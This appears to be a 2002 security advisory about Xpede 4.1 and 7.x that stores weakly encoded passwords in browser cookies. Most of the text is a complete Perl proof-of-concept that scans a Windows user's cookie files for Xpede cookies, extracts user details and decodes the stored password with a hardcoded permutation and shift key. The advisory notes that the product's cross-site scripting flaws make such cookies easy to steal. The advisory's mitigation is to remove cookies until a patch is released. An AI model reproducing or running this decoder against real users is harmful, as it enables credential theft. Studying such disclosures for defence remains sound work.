COMMAND Xpede cookie password decode SYSTEMS AFFECTED Xpede 4.1 and 7.x series PROBLEM Gregory Duchemin [c3rb3r@hotmail.com] posted : This code will decipher Xpede cookie based passwords. It makes it dangerous since the are many cross-site scripting vulns in the program. Proof of concept (password recovery from cookies) ================ #!/usr/bin/perl # Xdeep.pl, search for and decipher Xpede passwords stored in these damn cookies # Pr00f of concept, not to be used for illegal purposes. # # Author: Gregory Duchemin Aka c3rb3r // March 2002 # #output format format STDOUT = + Userid: @<<<<<<< $userid + Realname: @<<<<<<<<<<<<<<<<<<<<<<<<< $realname + Company: @<<<<<<<<<<<<<<<<<<<< $company + Encoded password: @<<<<<<<<<<<<<<<<<<<< $password . #Cookie fingerprint $signature=\"defPWD\"; #decoding stuff @PERMU=(\'9\', \'11\', \'2\', \'6\', \'4\', \'10\', \'1\', \'8\', \'7\', \'3\', \'5\'); @ALPHA= (\'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\', \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\' , \'P\', \'Q\', \'R\',\'S\', \'T\', \'U\', \'V\', \'W\', \'X\', \'Y\', \'Z\', \'a\',\'b\',\'c\',\'d\',\' e\',\'f\',\'g\',\'h\',\'i\',\'j\',\'k\',\'l\',\'m\',\'n\',\'o\',\'p\',\'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\' ,\'z\'); @SHIFT=(9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23); #Change the following path to match your system @COOKIE= glob (\'c:\\winnt\\Profiles\\*\\Cookies\\*@*.txt\'); $i=$count=0; @FOUND= (\'nope\'); print \"\\n\\nXdeep.pl Xpede cookies finder and decoder \\n\\n-- Gregory Duchemin (Aka C3rb3r) ^ Feb 2002 -- \\n\\n\\n\"; foreach $try (@COOKIE) { $count++; if (open(handle, $try)) { @lines=<handle>; if (!index($lines[0], $signature)) { printf(\"\\n+ Xpede cookie found ! yep :) <=> %s\\n\", $try); $FOUND[$i]=$try; $i++; } close(handle); } } printf(\"\\n+ %d files checked.\\n\", $count); if (! $i) { print \"\\n\\n- No Xpede cookie found, sorry\\n\\n\"; exit(0); } printf(\"\\n\\n+ %d Cookie(s) found.\\n\", $i); print \"\\n\\n\\n[Press return]\\n\"; $try=<STDIN>; foreach $try (@FOUND) { if (open(handle, $try)) { @lines=<handle>; $userid= @lines[55]; $realname=@lines[64]; $password=@lines[46]; $company=@lines[28]; $realname =~ s/\\+/ /; $userid =~ s/\\+/ /; $password =~ s/\\+/ /; $company =~ s/\\+/ /; $userid =~ s/%([a-f0-9][a-f0-9])/pack(\"C\", hex ($1))/eig; $realname =~ s/%([a-f0-9][a-f0-9])/pack(\"C\", hex ($1))/eig; $password =~ s/%([a-f0-9][a-f0-9])/pack(\"C\", hex ($1))/eig; $company =~ s/%([a-f0-9][a-f0-9])/pack(\"C\", hex ($1))/eig; printf \"\\n+ Found Xpede cookie :\\n>> %s <<\\n\\n\", $try; write; print \"\\n\\n! Cr4cking 1n progr3ss ... \\n\"; @list=split //, $password; if (length($password) > 12 ) { $MAX = 11; $DIFF = length($password)-1-$MAX; for ($i = 0; $i < ($DIFF); $i++) {$REST = $REST.$list [$i]; } splice(@list, 0, ($DIFF)); printf \"\\n+ Clear part is %s\\n\", $REST; } else {$MAX = length($password)-1;printf \"\\n- No clear part found \\n\";} for ($i=0; $i<$MAX; $i) { $temp_pass = $temp_pass.$list[$PERMU[$i++]-1]; } printf \"\\n+ Permutations give %s\\n\", $temp_pass; @list=split //, $temp_pass; for ($i=0; $i<$MAX; $i++) { $b = ord($list[$i]); $c = $SHIFT[$i]; $flag=0; for ($z=0; $z<52; $z+=1) { if (ord($ALPHA[$z]) == $b) { $a = ord($ALPHA [($z+$c)%52]);$flag=1;} } if (!$flag) {$a = $b;} $decode = $decode.chr($a); printf \"\\n+ %s Shift(%d) \\t --> \\t%s\", chr($b), $c, chr ($a); } printf \"\\n\\n+ Shifting with secret key give %s\\n\", $decode; printf \"\\n! Password is \\\"%s\\\"\\n\\n\", $decode.$REST; printf \"\\n\\n- End.\\n\\n\"; $decode=$REST=$temp_pass=\"\"; close(handle); print \"\\n\\n[Press return]\\n\"; $try=<STDIN>; } } SOLUTION Remove cookies until patch is released